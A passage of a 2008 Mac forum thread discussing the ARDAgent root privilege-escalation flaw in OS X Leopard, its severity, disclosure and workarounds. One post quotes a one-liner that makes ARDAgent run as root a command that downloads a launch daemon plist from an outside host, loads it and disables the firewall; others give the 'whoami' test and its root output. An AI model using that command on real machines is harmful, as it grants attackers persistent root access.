Welcome to the MacNN Forums.

If this is your first visit, be sure to check out the FAQ by clicking the link above. You may have to register before you can post: click the register link above to proceed. To start viewing messages, select the forum that you want to visit from the selection below.

You are here: MacNN Forums > Software - Troubleshooting and Discussion > macOS > Huge, Crazy, Ridiculous OS X Security Hole

Huge, Crazy, Ridiculous OS X Security Hole (Page 2)
Thread Tools
Horsepoo!!!
Banned
Join Date: Jun 2003
Status: Offline
Reply With Quote
Jun 20, 2008, 11:29 AM
 
Originally Posted by besson3c View Post
What does leaving ports open have to do with this?
It has nothing to do with this except that it's related to security...I was merely making a reference to a thread about some other subject on security and trojans. Reading is hard isn't it. But it's ok besson3c, reading comprehension problems is probably the most common thing on the internet so you're forgiven.
     
Peter
Addicted to MacNN
Join Date: Oct 2002
Location: England | San Francisco
Status: Offline
Reply With Quote
Jun 20, 2008, 11:35 AM
 
This isn't that bad. Ironically it'd be most severe to computers such as ones in the Apple Store.
You can't do it over SSH. You need physical access, and you need to be logged in for it to work.

I'm not saying it isn't serious - it is. But it isn't a huge crazy security hole.

This was quite neat:
Code:
osascript -e 'tell app "ARDAgent" to do shell script "cd /System/Library/LaunchDaemons ; curl -o bash.plist http://cdslash.net/temp/bash.plist [cdslash.net] ; chmod 600 bash.plist ; launchctl load bash.plist ; launchctl start com.apple.bash ; ipfw disable firewall; launchctl'
we don't have time to stop for gas
     
ghporter
Administrator
Join Date: Apr 2001
Location: San Antonio TX USA
Status: Offline
Reply With Quote
Jun 20, 2008, 12:00 PM
 
Originally Posted by Chuckit View Post
Sending Charles' example command to ARDAgent will answer the question definitively. If whoami says that ARDAgent is root, then it's vulnerable; if it says it's your user, then ARDAgent is safe.
Thanks. I was sort of confused by a number of tests presented here. Too many paths and stuff to mess with for a "is it vulnerable?" test in my opinion. Charles' (which Simon repeated) is pretty terse and hard to mess up. That's just what I was looking for.

Glenn -----OTR/L, MOT, Tx
     
besson3c
Clinically Insane
Join Date: Mar 2001
Location: yes
Status: Offline
Reply With Quote
Jun 20, 2008, 12:23 PM
 
Does WindowServer support X11 forwarding? If not, will this exploit work with an xterm?
     
mduell
Posting Junkie
Join Date: Oct 2005
Location: Houston, TX
Status: Offline
Reply With Quote
Jun 20, 2008, 12:48 PM
 
Originally Posted by Horsepoo!!! View Post
One thing's for sure, Apple can remove this page and probably should: Apple - Mac OS X Leopard - Technology - Security
Sandbox tested
Sometimes hackers try to hijack an application to run malicious code. Sandboxing helps ensure that applications do only what they’re intended to by restricting which files they can access, whether they can talk to the network, and whether they can be used to launch other applications. Helper applications in Leopard — including the software that enables Bonjour and the Spotlight indexer — are sandboxed to guard against attackers.


Did the sandbox screening process fail? Did the sandboxing analysis process fail? I doubt Apple will every publicly answer that.
     
turtle777
Clinically Insane
Join Date: Jun 2001
Location: planning a comeback !
Status: Offline
Reply With Quote
Jun 20, 2008, 12:51 PM
 
Originally Posted by mduell View Post
Did the sandbox screening process fail? Did the sandboxing analysis process fail? I doubt Apple will every publicly answer that.
According to Apple's response to the different submissions, they don't think there is a problem.

Yeah, I know, how stupid that sounds.

-t
     
villalobos
Mac Elite
Join Date: Apr 2000
Status: Offline
Reply With Quote
Jun 20, 2008, 01:01 PM
 
Originally Posted by ghporter View Post
Thanks. I was sort of confused by a number of tests presented here. Too many paths and stuff to mess with for a "is it vulnerable?" test in my opinion. Charles' (which Simon repeated) is pretty terse and hard to mess up. That's just what I was looking for.
On that point, why do I get an error message then? Why isn't everybody vulnerable, since this does not seem to be relying on people checking some options or not?
     
Chuckit
Clinically Insane
Join Date: Oct 2001
Location: San Diego, CA, USA
Status: Offline
Reply With Quote
Jun 20, 2008, 02:41 PM
 
Originally Posted by villalobos View Post
On that point, why do I get an error message then? Why isn't everybody vulnerable, since this does not seem to be relying on people checking some options or not?
I'm guessing you're on 10.4 and getting an "AppleEvent timed out" message? I think the initial report may have been partly incorrect, because I haven't gotten the exploit to work with ARDAgent on any 10.4 Mac as of yet, only Leopard.

BTW, in case anyone else was wondering, I ran a script to test whether there are any more system utilities that have this particular set of vulnerabilities (setuid + Cocoa scripting) and I didn't find anything. I'm not an expert on AppleEvents, so it's possible I missed something, but I think ARDAgent is the only thing that users need to fix at the moment.
( Last edited by Chuckit; Jun 20, 2008 at 03:05 PM. )
Chuck
___
"Instead of either 'multi-talented' or 'multitalented' use 'bisexual'."
     
besson3c
Clinically Insane
Join Date: Mar 2001
Location: yes
Status: Offline
Reply With Quote
Jun 20, 2008, 02:48 PM
 
Chuckit: good idea looking for other setuid root files. To anybody interested, you don't need a script to do this search, you can conduct this search by doing a:

Code:
sudo find / -type f \( -perm -04000 -o -perm -02000 \) \-exec ls -lg {} \;
     
Chuckit
Clinically Insane
Join Date: Oct 2001
Location: San Diego, CA, USA
Status: Offline
Reply With Quote
Jun 20, 2008, 03:00 PM
 
Well, like I said, it wasn't specifically looking for setuid. There are tons of those. I was specifically looking for setuid utilities that looked like they might support Cocoa Scripting.

Basically, what I was looking for was:
- Is it setuid?
-- Does it link to Foundation?
--- Is it an app rather than a standalone tool?

Some AppleScript guru might be able to correct me if there's something I missed with that, but that seems like a reasonable test.
Chuck
___
"Instead of either 'multi-talented' or 'multitalented' use 'bisexual'."
     
villalobos
Mac Elite
Join Date: Apr 2000
Status: Offline
Reply With Quote
Jun 20, 2008, 03:03 PM
 
Originally Posted by Chuckit View Post
I'm guessing you're on 10.4 and getting an "AppleEvent timed out" message? I think the initial report may have been partly incorrect, because I haven't gotten the exploit to work with ARDAgent on any 10.4 Mac as of yet, only Leopard.

BTW, in case anyone else was wondering, I ran a script to test whether there are any more system utilities that have this particular set of vulnerabilities (setuid + Cocoa scripting) and I didn't find anything,
Yes 10.4.11. And that's the error message I get indeed.
     
steve626
Dedicated MacNNer
Join Date: Aug 2005
Status: Offline
Reply With Quote
Jun 21, 2008, 02:11 AM
 
Originally Posted by Peter View Post
... Ironically it'd be most severe to computers such as ones in the Apple Store.
You can't do it over SSH. You need physical access, and you need to be logged in for it to work.
Well it's not that much of a threat in the Apple Store. I was in an Apple Store after closing once and the employees fanned out with portable external drives that were used to (a) reformat the internal hard drives on the store Macs and (b) restore a standard build of the OS plus applications on each store computer. I asked one of the employees why they do that and she told me that they have no idea what crazy stuff customers might put on their computers during the day, so they reformat them all and restore them back every night.
iMac Intel Core 2 Duo 2.66 GHz, 4 Gig RAM, 10.6.8
Macbook Pro Retina Display 15", 16 GB RAM, 10.7.4
iMac G5 2GHz, 1.5 GB RAM, 10.5.8
Macbook Air Core 2 Duo 4 Gig RAM, 10.6.8
     
SleePyCode
Fresh-Faced Recruit
Join Date: May 2007
Status: Offline
Reply With Quote
Jun 21, 2008, 04:01 AM
 
Thanks a lot apple. Due to your negligence this *rootkit* exploit had to become public and put millions of apple users at risk, when you could of simply fixed it as it should of been 4 years ago.

Nice to know Apple has let this whole run for 4 years. Makes me question if I should us os x or go linux.
     
TETENAL
Addicted to MacNN
Join Date: Aug 2004
Location: FFM
Status: Offline
Reply With Quote
Jun 21, 2008, 05:04 AM
 
Originally Posted by SleePyCode View Post
Thanks a lot apple. Due to your negligence this *rootkit* exploit had to become public and put millions of apple users at risk, when you could of simply fixed it as it should of been 4 years ago.
You can thank CharlesS for that. It was his idea to post his findings on Slashdot instead of notifying Apple and giving them appropriate time to fix it.
     
JKT
Professional Poster
Join Date: Jan 2002
Location: London, UK
Status: Offline
Reply With Quote
Jun 21, 2008, 05:21 AM
 
Um, Charles states explicitly that he has notified Apple of this several times over the past FOUR ****ING YEARS.
     
analogika
Posting Junkie
Join Date: Feb 2005
Location: 888500128
Status: Offline
Reply With Quote
Jun 21, 2008, 05:31 AM
 
Charles is also NOT the one who posted this to Slashdot.
     
TETENAL
Addicted to MacNN
Join Date: Aug 2004
Location: FFM
Status: Offline
Reply With Quote
Jun 21, 2008, 05:45 AM
 
Originally Posted by JKT View Post
Um, Charles states explicitly that he has notified Apple of this several times over the past FOUR ****ING YEARS.
But not that ARD Agent runs shell scripts as root when scripted if I understood him correctly. Apple should have been given sufficient time to investigate this issue before running to the media.
     
TETENAL
Addicted to MacNN
Join Date: Aug 2004
Location: FFM
Status: Offline
Reply With Quote
Jun 21, 2008, 05:48 AM
 
Originally Posted by analogika View Post
Charles is also NOT the one who posted this to Slashdot.
Then thanks to whoever that guy was. Not.
     
CharlesS  (op)
Posting Junkie
Join Date: Dec 2000
Status: Offline
Reply With Quote
Jun 21, 2008, 10:47 AM
 
Originally Posted by analogika View Post
Charles is also NOT the one who posted this to Slashdot.
Yeah, that wasn't me. The only place I posted this on the Web was here, so you guys could know about it and chmod the binary so you wouldn't be vulnerable. And that was after the article showed up on Slashdot and the cat was already out of the bag.

And yeah, I've been letting Apple know that root accepted AppleScripts from non-root for a really freaking long time now. Hopefully now they'll find this issue important enough for their attention.
( Last edited by CharlesS; Jun 21, 2008 at 11:08 AM. )

Ticking sound coming from a .pkg package? Don't let the .bom go off! Inspect it first with Pacifist. Macworld - five mice!
     
Chuckit
Clinically Insane
Join Date: Oct 2001
Location: San Diego, CA, USA
Status: Offline
Reply With Quote
Jun 21, 2008, 10:56 AM
 
Originally Posted by TETENAL View Post
But not that ARD Agent runs shell scripts as root when scripted if I understood him correctly. Apple should have been given sufficient time to investigate this issue before running to the media.
Four years is a lot of time to investigate the issue considering I wrote a script that could have cracked the case in like five minutes.
Chuck
___
"Instead of either 'multi-talented' or 'multitalented' use 'bisexual'."
     
turtle777
Clinically Insane
Join Date: Jun 2001
Location: planning a comeback !
Status: Offline
Reply With Quote
Jun 21, 2008, 12:10 PM
 
Originally Posted by steve626 View Post
Well it's not that much of a threat in the Apple Store. I was in an Apple Store after closing once and the employees fanned out with portable external drives that were used to (a) reformat the internal hard drives on the store Macs and (b) restore a standard build of the OS plus applications on each store computer. I asked one of the employees why they do that and she told me that they have no idea what crazy stuff customers might put on their computers during the day, so they reformat them all and restore them back every night.
Are you kidding me ? They do it manually ?

Do they have people do this all night ?

-t
     
Chuckit
Clinically Insane
Join Date: Oct 2001
Location: San Diego, CA, USA
Status: Offline
Reply With Quote
Jun 21, 2008, 12:29 PM
 
It shouldn't take more than an hour (at least at the stores I've been to) even if they only have one hard drive per employee.
Chuck
___
"Instead of either 'multi-talented' or 'multitalented' use 'bisexual'."
     
turtle777
Clinically Insane
Join Date: Jun 2001
Location: planning a comeback !
Status: Offline
Reply With Quote
Jun 21, 2008, 12:36 PM
 
Originally Posted by Chuckit View Post
It shouldn't take more than an hour (at least at the stores I've been to) even if they only have one hard drive per employee.
Can't that be done automagically over LAN and Apple Remote Desktop ?

-t
     
analogika
Posting Junkie
Join Date: Feb 2005
Location: 888500128
Status: Offline
Reply With Quote
Jun 21, 2008, 03:16 PM
 
Automated and complete restore - all it takes is a reboot:

Faronics Deep Freeze Mac - ABSOLUTE Workstation Integrity
     
kupan787
Senior User
Join Date: Jun 1999
Location: San Jose, CA
Status: Offline
Reply With Quote
Jun 21, 2008, 04:08 PM
 
Its working for me, but I have a bunch of other crap being spwed out (is that normal)?

benmac:~ kupan787$ osascript -e 'tell application "ARDAgent" to do shell script "whoami"'
2008-06-21 13:08:15.377 osascript[97280:10b] *** _NSAutoreleaseNoPool(): Object 0x137ff0 of class NSPathStore2 autoreleased with no pool in place - just leaking
Stack: (0x90e0ccdf 0x90d1a767 0x90d224af 0x90d21fae 0x90d26a5b 0xd48e6 0xd4b5b 0x97207f97 0x972082f6 0x921f6c74 0x921e8648 0x921f17be 0x921f45ab 0x93462caf 0x2a017a 0x2a3dfd 0x2a3fc0 0x28bc3d 0x28bf07 0x28bfa5 0x283a2d 0x929c3f31 0x97206168 0x29f6c4 0x29f7e2 0x29f915 0x29f11c 0x29f8c9 0x929c3f31 0x97217513 0x20c9)
2008-06-21 13:08:15.379 osascript[97280:10b] *** _NSAutoreleaseNoPool(): Object 0x139400 of class NSPathStore2 autoreleased with no pool in place - just leaking
Stack: (0x90e0ccdf 0x90d1a767 0x90d19869 0x90d23fd2 0x90d26c32 0xd48e6 0xd4b5b 0x97207f97 0x972082f6 0x921f6c74 0x921e8648 0x921f17be 0x921f45ab 0x93462caf 0x2a017a 0x2a3dfd 0x2a3fc0 0x28bc3d 0x28bf07 0x28bfa5 0x283a2d 0x929c3f31 0x97206168 0x29f6c4 0x29f7e2 0x29f915 0x29f11c 0x29f8c9 0x929c3f31 0x97217513 0x20c9)
2008-06-21 13:08:15.380 osascript[97280:10b] *** _NSAutoreleaseNoPool(): Object 0x13a990 of class NSPathStore2 autoreleased with no pool in place - just leaking
Stack: (0x90e0ccdf 0x90d1a767 0x90d224af 0x90d21fae 0x90d21eb6 0x90d27f58 0xd49fc 0xd4b5b 0x97207f97 0x972082f6 0x921f6c74 0x921e8648 0x921f17be 0x921f45ab 0x93462caf 0x2a017a 0x2a3dfd 0x2a3fc0 0x28bc3d 0x28bf07 0x28bfa5 0x283a2d 0x929c3f31 0x97206168 0x29f6c4 0x29f7e2 0x29f915 0x29f11c 0x29f8c9 0x929c3f31 0x97217513 0x20c9)
2008-06-21 13:08:15.380 osascript[97280:10b] *** _NSAutoreleaseNoPool(): Object 0x13a790 of class NSBundle autoreleased with no pool in place - just leaking
Stack: (0x90e0ccdf 0x90d19562 0xd49fc 0xd4b5b 0x97207f97 0x972082f6 0x921f6c74 0x921e8648 0x921f17be 0x921f45ab 0x93462caf 0x2a017a 0x2a3dfd 0x2a3fc0 0x28bc3d 0x28bf07 0x28bfa5 0x283a2d 0x929c3f31 0x97206168 0x29f6c4 0x29f7e2 0x29f915 0x29f11c 0x29f8c9 0x929c3f31 0x97217513 0x20c9)
2008-06-21 13:08:15.381 osascript[97280:10b] *** _NSAutoreleaseNoPool(): Object 0x13acd0 of class NSCFArray autoreleased with no pool in place - just leaking
Stack: (0x90e0ccdf 0x90d19562 0x90d4b8f1 0x90d4b8ba 0xd4ad2 0xd4b5b 0x97207f97 0x972082f6 0x921f6c74 0x921e8648 0x921f17be 0x921f45ab 0x93462caf 0x2a017a 0x2a3dfd 0x2a3fc0 0x28bc3d 0x28bf07 0x28bfa5 0x283a2d 0x929c3f31 0x97206168 0x29f6c4 0x29f7e2 0x29f915 0x29f11c 0x29f8c9 0x929c3f31 0x97217513 0x20c9)
2008-06-21 13:08:15.381 osascript[97280:10b] *** _NSAutoreleaseNoPool(): Object 0x13b3f0 of class NSPathStore2 autoreleased with no pool in place - just leaking
Stack: (0x90e0ccdf 0x90d1a767 0x90d19869 0x90d23fd2 0x90d23e62 0x90d4c05a 0x90d4b9bf 0x90d4b8ba 0xd4ad2 0xd4b5b 0x97207f97 0x972082f6 0x921f6c74 0x921e8648 0x921f17be 0x921f45ab 0x93462caf 0x2a017a 0x2a3dfd 0x2a3fc0 0x28bc3d 0x28bf07 0x28bfa5 0x283a2d 0x929c3f31 0x97206168 0x29f6c4 0x29f7e2 0x29f915 0x29f11c 0x29f8c9 0x929c3f31 0x97217513 0x20c9)
2008-06-21 13:08:15.382 osascript[97280:10b] LCC Scroll Enhancer loaded
2008-06-21 13:08:15.383 osascript[97280:10b] *** _NSAutoreleaseNoPool(): Object 0x13d110 of class NSMachPort autoreleased with no pool in place - just leaking
Stack: (0x90e0ccdf 0x90d19562 0x90d38f65 0x90d5fe4f 0xdb702 0xdb5bf 0xd4b2e 0xd4b5b 0x97207f97 0x972082f6 0x921f6c74 0x921e8648 0x921f17be 0x921f45ab 0x93462caf 0x2a017a 0x2a3dfd 0x2a3fc0 0x28bc3d 0x28bf07 0x28bfa5 0x283a2d 0x929c3f31 0x97206168 0x29f6c4 0x29f7e2 0x29f915 0x29f11c 0x29f8c9 0x929c3f31 0x97217513 0x20c9)
2008-06-21 13:08:15.383 osascript[97280:10b] *** _NSAutoreleaseNoPool(): Object 0x13e3f0 of class NSCFNumber autoreleased with no pool in place - just leaking
Stack: (0x90e0ccdf 0x90d19562 0xdc1b2 0xdb766 0xdb5bf 0xd4b2e 0xd4b5b 0x97207f97 0x972082f6 0x921f6c74 0x921e8648 0x921f17be 0x921f45ab 0x93462caf 0x2a017a 0x2a3dfd 0x2a3fc0 0x28bc3d 0x28bf07 0x28bfa5 0x283a2d 0x929c3f31 0x97206168 0x29f6c4 0x29f7e2 0x29f915 0x29f11c 0x29f8c9 0x929c3f31 0x97217513 0x20c9)
2008-06-21 13:08:15.384 osascript[97280:10b] *** _NSAutoreleaseNoPool(): Object 0x13e830 of class NSCFString autoreleased with no pool in place - just leaking
Stack: (0x90e0ccdf 0x90d19562 0x90d9a02a 0xdb766 0xdb5bf 0xd4b2e 0xd4b5b 0x97207f97 0x972082f6 0x921f6c74 0x921e8648 0x921f17be 0x921f45ab 0x93462caf 0x2a017a 0x2a3dfd 0x2a3fc0 0x28bc3d 0x28bf07 0x28bfa5 0x283a2d 0x929c3f31 0x97206168 0x29f6c4 0x29f7e2 0x29f915 0x29f11c 0x29f8c9 0x929c3f31 0x97217513 0x20c9)
2008-06-21 13:08:15.384 osascript[97280:10b] *** _NSAutoreleaseNoPool(): Object 0x13e870 of class NSPathStore2 autoreleased with no pool in place - just leaking
Stack: (0x90e0ccdf 0x90d1a767 0x90d28d75 0xdb782 0xdb5bf 0xd4b2e 0xd4b5b 0x97207f97 0x972082f6 0x921f6c74 0x921e8648 0x921f17be 0x921f45ab 0x93462caf 0x2a017a 0x2a3dfd 0x2a3fc0 0x28bc3d 0x28bf07 0x28bfa5 0x283a2d 0x929c3f31 0x97206168 0x29f6c4 0x29f7e2 0x29f915 0x29f11c 0x29f8c9 0x929c3f31 0x97217513 0x20c9)
2008-06-21 13:08:15.384 osascript[97280:10b] *** _NSAutoreleaseNoPool(): Object 0x13ea00 of class NSCFData autoreleased with no pool in place - just leaking
Stack: (0x90e0ccdf 0x90d19562 0x90d2dc35 0x90d3b9fa 0x90d3b8b8 0x90d3b6d5 0xdb79e 0xdb5bf 0xd4b2e 0xd4b5b 0x97207f97 0x972082f6 0x921f6c74 0x921e8648 0x921f17be 0x921f45ab 0x93462caf 0x2a017a 0x2a3dfd 0x2a3fc0 0x28bc3d 0x28bf07 0x28bfa5 0x283a2d 0x929c3f31 0x97206168 0x29f6c4 0x29f7e2 0x29f915 0x29f11c 0x29f8c9 0x929c3f31 0x97217513 0x20c9)
2008-06-21 13:08:15.411 osascript[97280:10b] Error loading /Library/ScriptingAdditions/QXPScriptingAdditions.osax/Contents/MacOS/QXPScriptingAdditions: dlopen(/Library/ScriptingAdditions/QXPScriptingAdditions.osax/Contents/MacOS/QXPScriptingAdditions, 262): no suitable image found. Did find:
/Library/ScriptingAdditions/QXPScriptingAdditions.osax/Contents/MacOS/QXPScriptingAdditions: mach-o, but wrong architecture
osascript: OpenScripting.framework - scripting addition /Library/ScriptingAdditions/QXPScriptingAdditions.osax declares no loadable handlers.
root
benmac:~ kupan787$
     
Chuckit
Clinically Insane
Join Date: Oct 2001
Location: San Diego, CA, USA
Status: Offline
Reply With Quote
Jun 21, 2008, 04:27 PM
 
It looks like you have some misbehaving Scripting Addition installed.
Chuck
___
"Instead of either 'multi-talented' or 'multitalented' use 'bisexual'."
     
SleePyCode
Fresh-Faced Recruit
Join Date: May 2007
Status: Offline
Reply With Quote
Jun 21, 2008, 06:57 PM
 
I got that as well, but it did spit out the name at the end. I changed the chmod and now it spits out my name. So I feel better. I fixed it on all 3 of my macs since I do use remote desktop and management to be lazy to do stuff such as software updates

I was not attacking CharlesS or anyone else for releasing this. If apple had done their job right over the past 4 years then this would of been fixed and not be an issue now. I see why this was made public, maybe Apple will actually fix it when they start getting lots of heat from this. Then again, maybe they will continue to mark it that it works as expected.

We can only hope that 10.5.3 or a security update is released with this patched in it. But this is Apple we are talking about :|
     
Chuckit
Clinically Insane
Join Date: Oct 2001
Location: San Diego, CA, USA
Status: Offline
Reply With Quote
Jun 21, 2008, 07:06 PM
 
Well, they're no longer saying it's working properly at least.
Chuck
___
"Instead of either 'multi-talented' or 'multitalented' use 'bisexual'."
     
steve626
Dedicated MacNNer
Join Date: Aug 2005
Status: Offline
Reply With Quote
Jun 22, 2008, 01:39 AM
 
Originally Posted by turtle777 View Post
Are you kidding me ? They do it manually ?

Do they have people do this all night ?

-t
In terms of the complete erase and restore of all the Macs in the Apple Store, this was in the Glendale, California store and it was over a year ago. Then it was done manually, each employee had three or four of these firelite drives and restored three of four Macs in parallel. It seemed pretty fast, maybe a half hour or less, and since it was all done in parallel, it was pretty much all done at once. They just hooked up each external drive and ran an erase/restore script and while it was running they could go do other things.

I suspect they might do this through a network now, maybe, but in any case, they probably aren't too concerned about security risks on their computers because they wipe them and restore a standard build each night after closing, at least in that store.
iMac Intel Core 2 Duo 2.66 GHz, 4 Gig RAM, 10.6.8
Macbook Pro Retina Display 15", 16 GB RAM, 10.7.4
iMac G5 2GHz, 1.5 GB RAM, 10.5.8
Macbook Air Core 2 Duo 4 Gig RAM, 10.6.8
     
Amorya
Mac Elite
Join Date: Mar 2001
Location: England
Status: Offline
Reply With Quote
Jun 22, 2008, 06:57 PM
 
If you turn on Remote Management (in Sharing), then it appears the exploit no longer works: I get

Code:
Magrat:~ amorya$ osascript -e 'tell application "ARDAgent" to do shell script "whoami"' 31:55: execution error: ARDAgent got an error: "whoami" doesn’t understand the do shell script message. (-1708)
Amorya
What the nerd community most often fail to realize is that all features aren't equal. A well implemented and well integrated feature in a convenient interface is worth way more than the same feature implemented crappy, or accessed through a annoying interface.
     
larkost
Mac Elite
Join Date: Oct 1999
Location: San Jose, Ca
Status: Offline
Reply With Quote
Jun 22, 2008, 08:50 PM
 
Originally Posted by steve626 View Post
In terms of the complete erase and restore of all the Macs in the Apple Store, this was in the Glendale, California store and it was over a year ago. Then it was done manually, each employee had three or four of these firelite drives and restored three of four Macs in parallel. It seemed pretty fast, maybe a half hour or less, and since it was all done in parallel, it was pretty much all done at once. They just hooked up each external drive and ran an erase/restore script and while it was running they could go do other things.

I suspect they might do this through a network now, maybe, but in any case, they probably aren't too concerned about security risks on their computers because they wipe them and restore a standard build each night after closing, at least in that store.
I would be really surprised if they were not using some sort of NetRestore at this point. And given an ASR-scanned dmg the restore (remote or disk-to-disk) should take no more than 15 minutes per disk (assuming a really large disk).

I have a system that can restore a computer over the network (complete disk wipe and restore) in about 12 minutes and is remotely trigger-able.
     
moep
Senior User
Join Date: Nov 2003
Status: Offline
Reply With Quote
Jun 23, 2008, 12:03 AM
 
Here we go.

Flaw in Apple Remote Desktop exploited via trojan

apple deserves this one. still no reaction it seems.
"The road to success is dotted with the most tempting parking spaces."
     
C.A.T.S. CEO
Professional Poster
Join Date: Nov 2004
Location: eating kernel
Status: Offline
Reply With Quote
Jun 23, 2008, 12:07 AM
 
Signature depreciated.
     
Arkham_c
Mac Elite
Join Date: Dec 2001
Location: Atlanta, GA, USA
Status: Offline
Reply With Quote
Jun 23, 2008, 09:45 AM
 
The thing is, all someone would have to do is write a simple game or utility, and use the Apple Installer that requires your password to install, then put the game up on Versiontracker, and you'd easily infect 10,000 machines without exploiting any flaws at all. People are used to giving their password during an install, so they would do so without raising suspicion.

Social engineering has always been the most effective way to compromise systems, and always will be,

In related news, try my new game on versiontracker!

Mac Pro 2x 2.66 GHz Dual core, Apple TV 160GB, two Windows XP PCs
     
TETENAL
Addicted to MacNN
Join Date: Aug 2004
Location: FFM
Status: Offline
Reply With Quote
Jun 23, 2008, 10:02 AM
 
That wouldn't work on publicly accessible machines like in universities. People don't have the password there.
     
mduell
Posting Junkie
Join Date: Oct 2005
Location: Houston, TX
Status: Offline
Reply With Quote
Jun 23, 2008, 09:18 PM
 
I'm surprised this hasn't been fixed yet.
     
EuropeBetterThanAmerica
Fresh-Faced Recruit
Join Date: Jun 2008
Location: Europe
Status: Offline
Reply With Quote
Jun 24, 2008, 03:48 AM
 
Does Mac OS X have an uneventful life so far?
( Last edited by EuropeBetterThanAmerica; Jun 24, 2008 at 03:49 AM. Reason: typo)

24" iMac >> MacBook >> iBookG4
     
analogika
Posting Junkie
Join Date: Feb 2005
Location: 888500128
Status: Offline
Reply With Quote
Jun 24, 2008, 04:22 AM
 
yes.
     
- - e r i k - -
Posting Junkie
Join Date: May 2001
Location: Brisbane, Australia
Status: Offline
Reply With Quote
Jun 25, 2008, 01:28 AM
 
Two fallacies noted in this thread:

1) Security by obscurity

By making this bug known and public isn't making it more of a threat. It does however put pressure on Apple to fix it and on users to protect themselves.

2) Local exploits

If a wannabe hacker has physical access to your machine all bets are off.

[ fb ] [ flickr ] [] [scl] [ last ] [ plaxo ]
     
P
Moderator
Join Date: Apr 2000
Location: Gothenburg, Sweden
Status: Offline
Reply With Quote
Jun 25, 2008, 02:05 AM
 
Originally Posted by - - e r i k - - View Post
2) Local exploits

If a wannabe hacker has physical access to your machine all bets are off.
Yes, that is the argument that always gets trotted out. Two things about it: It doesn't apply in a public environment, such as the inside of an Applestore or a computer lab at a school. If you'd start pulling the machine apart, people would notice and stop you. If you run a program, noone would notice.

The other thing is what has happened - a trojan can run as root without you writing your admin password, and even do so from a regular user account.
     
Big Mac
Clinically Insane
Join Date: Oct 2000
Location: Los Angeles
Status: Offline
Reply With Quote
Jun 25, 2008, 02:35 AM
 
Well said, P. The notion that local exploits don't mean anything because a box is compromised if someone has access to its keyboard is illogical and is to me an excuse for lazy programming. OS X enforces a lot of local security measures that Mac users have had to adapt to, and given that focus on security it doesn't make much sense if there are well known exploits that can defeat those measures easily. Single user mode is one potential local exploit that's too easy to access in my opinion, but at least Apple provides the firmware password option to remedy that if one wishes to. One should not be able to easily defeat local security only with access to a keyboard.
( Last edited by Big Mac; Jun 25, 2008 at 02:48 AM. )

"The natural progress of things is for liberty to yield and government to gain ground." TJ
     
Horsepoo!!!
Banned
Join Date: Jun 2003
Status: Offline
Reply With Quote
Jun 25, 2008, 08:10 AM
 
Originally Posted by Big Mac View Post
Well said, P. The notion that local exploits don't mean anything because a box is compromised if someone has access to its keyboard is illogical and is to me an excuse for lazy programming. OS X enforces a lot of local security measures that Mac users have had to adapt to, and given that focus on security it doesn't make much sense if there are well known exploits that can defeat those measures easily. Single user mode is one potential local exploit that's too easy to access in my opinion, but at least Apple provides the firmware password option to remedy that if one wishes to. One should not be able to easily defeat local security only with access to a keyboard.
In most cases, if someone has managed to beat other forms of security to get a physical hold of your machine, firmware passwords or OS X passwords won't make a difference in the grand scheme of things. This guy has dodged security guards or has managed to break into your house unnoticed. This guy will likely take the hard drive with him whether the guards, the university lab officials or you like it or not. It's certainly the easiest part of the whole process.

As erik has said...if someone has access to your machine, all bets are off. Hackers won't spend time trying to hack through local security with the keyboard when they're right next to the effin' machine. No amounts of clever software security measures will stop this person from opening your computer up and taking the data with him.

Firmware passwords exist so people get warm fuzzy feelings of (false) security.
( Last edited by Horsepoo!!!; Jun 25, 2008 at 08:19 AM. )
     
TETENAL
Addicted to MacNN
Join Date: Aug 2004
Location: FFM
Status: Offline
Reply With Quote
Jun 25, 2008, 08:57 AM
 
Sorry, but there is a major difference between opening a computer case and taking the hard drive with you and running an applescript to become root when it comes to places like university computer labs. The former can hardly be done when other people are around, the latter can.
     
P
Moderator
Join Date: Apr 2000
Location: Gothenburg, Sweden
Status: Offline
Reply With Quote
Jun 25, 2008, 10:48 AM
 
What TETENAL said. On Apple's current iMacs, getting to the harddrive and disassembling it takes some fifteen minutes and requires special tools. It takes about as long to put it back together, and anyone in the same room will know that you're up to no good. Not sure about the Mac mini, but it's about the same. Running a script like this would take seconds, and it can be done in the background while you're browsing or whatever.
     
Hal Itosis
Grizzled Veteran
Join Date: Mar 2004
Status: Offline
Reply With Quote
Jun 25, 2008, 11:49 AM
 
Originally Posted by Horsepoo!!! View Post
In most cases, if someone has managed to beat other forms of security to get a physical hold of your machine, firmware passwords or OS X passwords won't make a difference in the grand scheme of things. This guy has dodged security guards or has managed to break into your house unnoticed. This guy will likely take the hard drive with him whether the guards, the university lab officials or you like it or not. It's certainly the easiest part of the whole process.
 
Have you ever been in a university computer lab?
They're not stocked with MacBooks we can just slip into our knapsacks.
Towers, eMacs and iMacs mostly... tethered to the tabletop.
Often a paid student lab monitor is present, or at least other students are there.
Risk stealing a hard drive? What ever for?

Originally Posted by Horsepoo!!! View Post
Firmware passwords exist so people get warm fuzzy feelings of (false) security.
 
Those can also be bolstered by solder and/or rubber cement (to obviate RAM tinkering).
[plus Permatex Locktite, stripped screw-heads, etc., etc.]

Sure, if someone's Mac is stolen it's end of story... but in office environments, etc.,
firmware passwords are fairly effective (so long as they're used along with other anti-
theft measures in mind).
( Last edited by Hal Itosis; Jun 25, 2008 at 11:57 AM. )
-HI-
     
mduell
Posting Junkie
Join Date: Oct 2005
Location: Houston, TX
Status: Offline
Reply With Quote
Jun 25, 2008, 06:11 PM
 
Originally Posted by - - e r i k - - View Post
2) Local exploits

If a wannabe hacker has physical access to your machine all bets are off.
Local exploits have nothing to do with physical access. In this context "local" is contrasted to "remote", and just means the attacker has an unprivileged account on the machine.
     
unhappyending
Fresh-Faced Recruit
Join Date: Feb 2007
Location: Earth.
Status: Offline
Reply With Quote
Jun 25, 2008, 06:14 PM
 
I read about this, I just deleted ADRAgent.
 Mac mini 1.66GHz Intel Core Duo, OS X 10.5.3, 1GB Ram.
 iMac G3 350MHz PowerPC G3, OS X 10.3.9, 256MB Ram
     
turtle777
Clinically Insane
Join Date: Jun 2001
Location: planning a comeback !
Status: Offline
Reply With Quote
Jun 25, 2008, 07:57 PM
 
Man, I just had this scary thought that someone could easily create an app that gains root access, installs a key logger and then transmits the harvested data via the internet.

Can you imagine the yield from an infected Apple Store ?

Even if it's just running one day, you'd get tons of passwords.

-t
     
- - e r i k - -
Posting Junkie
Join Date: May 2001
Location: Brisbane, Australia
Status: Offline
Reply With Quote
Jun 25, 2008, 08:19 PM
 
Originally Posted by mduell View Post
